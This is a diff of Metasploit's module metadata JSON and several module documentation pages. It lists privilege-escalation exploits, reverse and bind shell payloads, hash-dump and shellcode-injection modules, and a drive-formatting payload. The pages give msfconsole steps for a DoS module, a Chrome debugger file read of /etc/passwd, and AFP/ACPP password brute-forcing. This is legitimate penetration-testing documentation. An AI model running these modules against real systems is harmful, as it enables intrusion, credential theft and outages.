+    "fullname": "exploit/windows/local/bypassuac_sdclt",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2017-03-17",
+    "type": "exploit",
+    "author": [
+      "enigma0x3",
+      "bwatters-r7"
+    ],
+    "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n        the current user hive, and inserting a custom command that will get invoked when\n        Window backup and restore is launched. It will spawn a second shell that has the UAC\n        flag turned off.\n\n        This module modifies a registry key, but cleans up the key once the payload has\n        been invoked.",
+    "references": [
+      "URL-https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
+      "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1",
+      "URL-https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-11-18 01:45:57 +0000",
+    "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/bypassuac_sdclt",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/bypassuac_silentcleanup": {
    "name": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)",
    "fullname": "exploit/windows/local/bypassuac_silentcleanup",
@@ -126600,7 +127415,7 @@
    "targets": [
      "Microsoft Windows"
    ],
-    "mod_time": "2019-07-02 12:36:07 +0000",
+    "mod_time": "2019-12-05 15:08:50 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_silentcleanup.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_silentcleanup",
@@ -126828,6 +127643,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/comahawk": {
+    "name": "Microsoft UPnP Local Privilege Elevation Vulnerability",
+    "fullname": "exploit/windows/local/comahawk",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-12",
+    "type": "exploit",
+    "author": [
+      "NCC Group",
+      "hoangprod",
+      "bwatters-r7"
+    ],
+    "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n      The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n      NT AUTHORITY\\LOCAL SERVICE\n      The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n      elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "CVE-2019-1322",
+      "CVE-2019-1405",
+      "EDB-47684",
+      "URL-https://github.com/apt69/COMahawk",
+      "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/",
+      "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-12-18 14:33:13 +0000",
+    "path": "/modules/exploits/windows/local/comahawk.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/comahawk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/local/current_user_psexec": {
    "name": "PsExec via Current User Token",
    "fullname": "exploit/windows/local/current_user_psexec",
@@ -128363,7 +129224,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2019-10-27 11:25:56 +0000",
+    "mod_time": "2019-12-12 15:20:51 +0000",
    "path": "/modules/exploits/windows/local/payload_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/local/payload_inject",
@@ -128444,7 +129305,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-10-02 14:50:00 +0000",
+    "mod_time": "2019-11-16 04:58:02 +0000",
    "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence_image_exec_options",
@@ -128483,7 +129344,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2019-05-31 17:44:35 +0000",
+    "mod_time": "2019-11-16 04:57:18 +0000",
    "path": "/modules/exploits/windows/local/persistence_service.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence_service",
@@ -136035,7 +136896,7 @@
      "OJ Reeves <oj@beyondbinary.io>",
      "Brent Cook <bcook@rapid7.com>"
    ],
-    "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n        allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n        the freed channel is used to achieve arbitrary code execution.",
+    "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n        allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n        the freed channel is used to achieve arbitrary code execution.\n\n        Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n        Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n        selection is correctly matched to the system's memory layout.\n\n        HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n        *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n        This is a non-standard configuration for normal servers, and the target will crash if\n        the aforementioned Registry key is not set!\n\n        If the target is crashing regardless, you will likely need to determine the non-paged\n        pool base in kernel memory and set it as the GROOMBASE option.",
    "references": [
      "CVE-2019-0708",
      "URL-https://github.com/zerosum0x0/CVE-2019-0708",
@@ -136060,7 +136921,7 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
    ],
-    "mod_time": "2019-11-11 17:33:10 +0000",
+    "mod_time": "2020-01-12 08:19:44 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -137763,7 +138624,7 @@
      "Execute payload",
      "Neutralize implant"
    ],
-    "mod_time": "2019-11-13 02:10:03 +0000",
+    "mod_time": "2019-11-25 18:26:37 +0000",
    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/doublepulsar_rce",
@@ -137858,7 +138719,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 09:41:08 +0000",
    "path": "/modules/exploits/windows/smb/group_policy_startup.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/group_policy_startup",
@@ -137866,6 +138727,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "badsamba"
+      ]
    },
    "needs_cleanup": null
  },
@@ -137971,7 +138835,7 @@
    "author": [
      "Solar Eclipse <solareclipse@phreedom.org>"
    ],
-    "description": "This is an exploit for a previously undisclosed\n        vulnerability in the bit string decoding code in the\n        Microsoft ASN.1 library. This vulnerability is not related\n        to the bit string vulnerability described in eEye advisory\n        AD20040210-2. Both vulnerabilities were fixed in the\n        MS04-007 patch.\n\n        You are only allowed one attempt with this vulnerability. If\n        the payload fails to execute, the LSASS system service will\n        crash and the target system will automatically reboot itself\n        in 60 seconds. If the payload succeeds, the system will no\n        longer be able to process authentication requests, denying\n        all attempts to login through SMB or at the console. A\n        reboot is required to restore proper functioning of an\n        exploited system.\n\n        This exploit has been successfully tested with the win32/*/reverse_tcp\n        payloads, however a few problems were encountered when using the\n        equivalent bind payloads. Your mileage may vary.",
+    "description": "This is an exploit for a previously undisclosed\n        vulnerability in the bit string decoding code in the\n        Microsoft ASN.1 library. This vulnerability is not related\n        to the bit string vulnerability described in eEye advisory\n        AD20040210-2. Both vulnerabilities were fixed in the\n        MS04-007 patch.  Windows 2000 SP4 Rollup 1 also patches this\n        vulnerability.\n\n        You are only allowed one attempt with this vulnerability. If\n        the payload fails to execute, the LSASS system service will\n        crash and the target system will automatically reboot itself\n        in 60 seconds. If the payload succeeds, the system will no\n        longer be able to process authentication requests, denying\n        all attempts to login through SMB or at the console. A\n        reboot is required to restore proper functioning of an\n        exploited system.\n\n        This exploit has been successfully tested with the win32/*/reverse_tcp\n        payloads, however a few problems were encountered when using the\n        equivalent bind payloads. Your mileage may vary.",
    "references": [
      "CVE-2003-0818",
      "OSVDB-3902",
@@ -137992,7 +138856,7 @@
    "targets": [
      "Windows 2000 SP2-SP4 + Windows XP SP0-SP1"
    ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2019-12-03 20:22:05 +0000",
    "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms04_007_killbill",
@@ -138000,6 +138864,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "kill-bill"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-restarts",
+        "crash-service-down"
+      ]
    },
    "needs_cleanup": null
  },
@@ -138277,7 +139151,7 @@
      "(stack)  Windows XP SP1 Italian",
      "(wcscpy) Windows 2003 SP0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-03 06:32:02 +0000",
    "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms06_040_netapi",
@@ -138285,6 +139159,13 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-restarts",
+        "crash-service-down"
+      ]
    },
    "needs_cleanup": null
  },
@@ -138812,7 +139693,7 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
-    "mod_time": "2019-05-22 17:16:06 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -138865,7 +139746,7 @@
    "targets": [
      "win x64"
    ],
-    "mod_time": "2018-10-11 17:23:59 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue_win8",
@@ -138921,7 +139802,7 @@
      "Native upload",
      "MOF upload"
    ],
-    "mod_time": "2019-05-22 20:05:44 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_psexec",
@@ -141920,7 +142801,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-17 19:28:07 +0000",
+    "mod_time": "2019-12-18 12:11:56 +0000",
    "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/vax/shell_reverse_tcp",
@@ -143037,6 +143918,42 @@
    },
    "needs_cleanup": false
  },
+  "payload_cmd/unix/bind_jjs": {
+    "name": "Unix Command Shell, Bind TCP (via jjs)",
+    "fullname": "payload/cmd/unix/bind_jjs",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Listen for a connection and spawn a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-21 16:38:18 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/bind_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_cmd/unix/bind_lua": {
    "name": "Unix Command Shell, Bind TCP (via Lua)",
    "fullname": "payload/cmd/unix/bind_lua",
@@ -143771,6 +144688,42 @@
    },
    "needs_cleanup": false
  },
+  "payload_cmd/unix/reverse_jjs": {
+    "name": "Unix Command Shell, Reverse TCP (via jjs)",
+    "fullname": "payload/cmd/unix/reverse_jjs",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Connect back and create a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-21 16:38:18 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_cmd/unix/reverse_ksh": {
    "name": "Unix Command Shell, Reverse TCP (via Ksh)",
    "fullname": "payload/cmd/unix/reverse_ksh",
@@ -153311,7 +154264,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
    "path": "/modules/payloads/singles/windows/format_all_drives.rb",
    "is_install_path": true,
    "ref_name": "windows/format_all_drives",
@@ -153319,6 +154272,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "ShellcodeOfDeath"
+      ]
    },
    "needs_cleanup": false
  },
@@ -160474,6 +161430,41 @@
    },
    "needs_cleanup": null
  },
+  "post_android/gather/hashdump": {
+    "name": "Android Gather Dump Password Hashes for Android Systems",
+    "fullname": "post/android/gather/hashdump",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die",
+      "timwr"
+    ],
+    "description": "Post Module to dump the password hashes for Android System. Root is required.\n           To perform this operation, two things are needed.  First, a password.key file\n           is required as this contains the hash but no salt.  Next, a sqlite3 database\n           is needed (with supporting files) to pull the salt from.  Combined, this\n           creates the hash we need.  Samsung based devices change the hash slightly.",
+    "references": [
+      "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
+      "URL-https://hashcat.net/forum/thread-2202.html"
+    ],
+    "platform": "Android",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-17 13:44:19 +0000",
+    "path": "/modules/post/android/gather/hashdump.rb",
+    "is_install_path": true,
+    "ref_name": "android/gather/hashdump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_android/gather/sub_info": {
    "name": "extracts subscriber info from target device",
    "fullname": "post/android/gather/sub_info",
@@ -160709,6 +161700,39 @@
    },
    "needs_cleanup": null
  },
+  "post_bsd/gather/hashdump": {
+    "name": "BSD Dump Password Hashes",
+    "fullname": "post/bsd/gather/hashdump",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Post module to dump the password hashes for all users on a BSD system.",
+    "references": [
+
+    ],
+    "platform": "BSD",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-02 08:54:04 +0000",
+    "path": "/modules/post/bsd/gather/hashdump.rb",
+    "is_install_path": true,
+    "ref_name": "bsd/gather/hashdump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_cisco/gather/enum_cisco": {
    "name": "Cisco Gather Device General Information",
    "fullname": "post/cisco/gather/enum_cisco",
@@ -163052,7 +164076,8 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "Dhiru Kholia <dhiru@openwall.com>"
+      "Dhiru Kholia <dhiru@openwall.com>",
+      "Henry Hoggard"
    ],
    "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n        machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
    "references": [
@@ -163064,7 +164089,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-28 10:16:59 +0000",
+    "mod_time": "2019-12-05 08:46:56 +0000",
    "path": "/modules/post/multi/gather/gpg_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/gpg_creds",
@@ -163664,7 +164689,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-04 19:24:43 +0000",
    "path": "/modules/post/multi/gather/ssh_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/ssh_creds",
@@ -163934,7 +164959,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-06 12:45:23 +0000",
    "path": "/modules/post/multi/manage/autoroute.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/autoroute",
@@ -164437,7 +165462,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-28 03:24:20 +0000",
+    "mod_time": "2019-12-13 10:51:58 +0000",
    "path": "/modules/post/multi/recon/local_exploit_suggester.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/local_exploit_suggester",
@@ -165817,7 +166842,7 @@
    "author": [
      "Danil Bazin <danil.bazin@hsc.fr>"
    ],
-    "description": "This module enumerates ways to decrypt bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
+    "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
    "references": [
      "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc",
      "URL-http://www.hsc.fr/ressources/outils/dislocker/"
@@ -165828,7 +166853,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-12-11 13:39:25 +0000",
    "path": "/modules/post/windows/gather/bitlocker_fvek.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bitlocker_fvek",
@@ -167739,7 +168764,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate all installed applications",
+    "description": "This module will enumerate all installed applications on a Windows system",
    "references": [

    ],
@@ -167749,7 +168774,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 14:10:48 +0000",
    "path": "/modules/post/windows/gather/enum_applications.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_applications",
@@ -168254,7 +169279,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-16 04:07:01 +0000",
    "path": "/modules/post/windows/gather/enum_hostfile.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_hostfile",
@@ -169126,7 +170151,7 @@
    "path": "/modules/post/windows/gather/local_admin_search_enum.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/local_admin_search_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -170999,6 +172024,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/shellcode_inject": {
+    "name": "Windows Manage Memory Shellcode Injection Module",
+    "fullname": "post/windows/manage/shellcode_inject",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "phra <https://iwantmore.pizza>"
+    ],
+    "description": "This module will inject into the memory of a process a specified shellcode.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-12-12 15:19:17 +0000",
+    "path": "/modules/post/windows/manage/shellcode_inject.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/shellcode_inject",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/sticky_keys": {
    "name": "Sticky Keys Persistance Module",
    "fullname": "post/windows/manage/sticky_keys",
@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+ Metasploit Framework before version 5.0.28
+
+## Verification Steps
+
+  1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b)
+  2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener
+  3. Start this module and set RHOSTS and RPORT to the target listener address and port.
+  4. Run the modulest <rhost>```
+  7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually.
+
+## Options
+
+ **DOSTYPE**
+
+	GENTLE: *Current sessions will continue to work, but not future ones*
+	  A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+
+	SOFT: *No past or future sessions will work*
+      A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+	HARD: *ReDOS or Catastrophic Regex Backtracking*
+	  A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+
+## Scenarios
+
+```
+msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:8080 - Sending DoS packet...
+^C[-] Stopping running againest current target...
+[*] Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,46 @@
+# Chrome Debugger Arbitary File Read / Abitrary Web Request Auxiliary Module
+
+This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.
+
+## Headless Chrome Sessions
+	
+A vulnerable Headless Chrome session can be started with the following command:
+
+```
+$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0
+```
+
+This will start a webserver running on port 9222 for all network interfaces.
+
+## Verification Steps
+	
+1. Start `msfconsole`
+2. Execute `auxiliary/gather/chrome_debugger`
+3. Execute `set RHOST $REMOTE_ADDRESS`
+4. Execute `set RPORT 9222`
+5. Execute either `set FILEPATH $FILE_PATH_ON_REMOTE` or `set URL $URL_FROM_REMOTE`
+6. Execute `run`
+
+## Options
+
+* FILEPATH - The file path on the remote you wish to retrieve
+* URL - A URL you wish to fetch the contents of from the remote machine
+
+**Note:** One or the other must be set!
+
+## Example Run
+
+```
+[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
+[*] Opened connection
+[*] Attempting to load url file:///etc/passwd
+[*] Received Data
+[*] Sending request for data
+[*] Received Data
+[+] Retrieved resource
+[*] Auxiliary module execution completed
+```
+
+## Notes
+
+This can be useful for retrieving cloud metadata in certain scenarios.  Primarily this module targets developers.
@@ -0,0 +1,28 @@
+## Vulnerable Application
+
+ACPP is an undocumented and proprietary Apple protocol found in Airport products which protects the credentials used to administer the device. This module attempts exploit a weak encryption mechanism (fixed XOR key) by brute forcing the password via a dictionary attack or specific password.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/acpp/login)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/acpp/login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Apple AirPort Extreme 802.11g
+
+  ```
+  msf > use auxiliary/scanner/acpp/login
+  msf auxiliary(scanner/acpp/login) > show options
+  msf auxiliary(scanner/acpp/login) > set RHOSTS 1.1.1.1
+      RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/acpp/login) > set PASSWORD myPassword
+      PASSWORD => myPassword
+  msf auxiliary(scanner/acpp/login) > run
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - Starting ACPP login sweep
+    [*] 1.1.1.1:5009 - 1.1.1.1:5009 - ACPP Login Successful: myPassword
+  ```
@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS. This module attempts to brute force authentication credentials for AFP.
+
+References:
+
+* [AFP_Reference](https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html)
+* [AFP_Security](https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html)
+
+### Kali 2019.3 Install Instructions
+
+1. `sudo apt-get install netatalk`
+2. edit `/etc/default/netatalk` and add the following lines:
+
+    ```
+    ATALKD_RUN=no
+    PAPD_RUN=no
+    CNID_METAD_RUN=yes
+    AFPD_RUN=yes
+    TIMELORD_RUN=no
+    A2BOOT_RUN=no
+    ```
+
+3. Restart the service: `sudo /etc/init.d/netatalk restart`
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/afp/afp_login`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Kali Linux 2019.3 and Netatalk 3.1.12
+
+  ```
+  msf > use modules/auxiliary/scanner/afp/afp_login
+  msf auxiliary(scanner/afp/afp_login) > set USERNAME tuser
+  msf auxiliary(scanner/afp/afp_login) > set PASSWORD myPassword
+  msf auxiliary(scanner/afp/afp_login) > set RHOST 172.17.0.2
+  msf auxiliary(scanner/afp/afp_login) > run
+    [*] 172.17.0.2:548 - Scanning IP: 172.17.0.2
+    [*] 172.17.0.2:548 - Login Successful: tuser:myPassword
+  ```
@@ -3,10 +3,11 @@
 Apple Filing Protocol (AFP) is Apple's file sharing protocol similar to SMB, and NFS.  This module will gather information about the service.
 Netatalk is a Linux implementation of AFP.

-The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
-  
+The following was done on Ubuntu 16.04, and is largely based on [missingreadme.wordpress.com](https://missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/):
+
  1. `sudo apt-get install netatalk`
  2. edit `/etc/default/netatalk` and add the following lines:
+
    ```
    ATALKD_RUN=no
    PAPD_RUN=no
@@ -15,6 +16,7 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
    TIMELORD_RUN=no
    A2BOOT_RUN=no
    ```
+
  3. Restart the service: `sudo /etc/init.d/netatalk restart`

 ## Verification Steps
@@ -22,40 +24,41 @@ The following was done on Ubuntu 16.04, and is largely base on [missingreadme.wo
  1. Install and configure afp (or netatalk in a Linux environment)
  2. Start msfconsole
  3. Do: `auxiliary/scanner/afp/afp_server_info`
-  4. Do: `run`
+  4. Do: `set RHOSTS [ip]`
+  5. Do: `run`

 ## Scenarios

-  A run against the configuration from these docs
+### Ubuntu 16.04 with Netatalk 2.2.5

  ```
-  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info 
+  msf5 auxiliary(scanner/acpp/login) > use auxiliary/scanner/afp/afp_server_info
  msf5 auxiliary(scanner/afp/afp_server_info) > set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  msf5 auxiliary(scanner/afp/afp_server_info) > run
-  
+
  [*] 1.1.1.1:548 - AFP 1.1.1.1 Scanning...
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548:548 AFP:
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true 
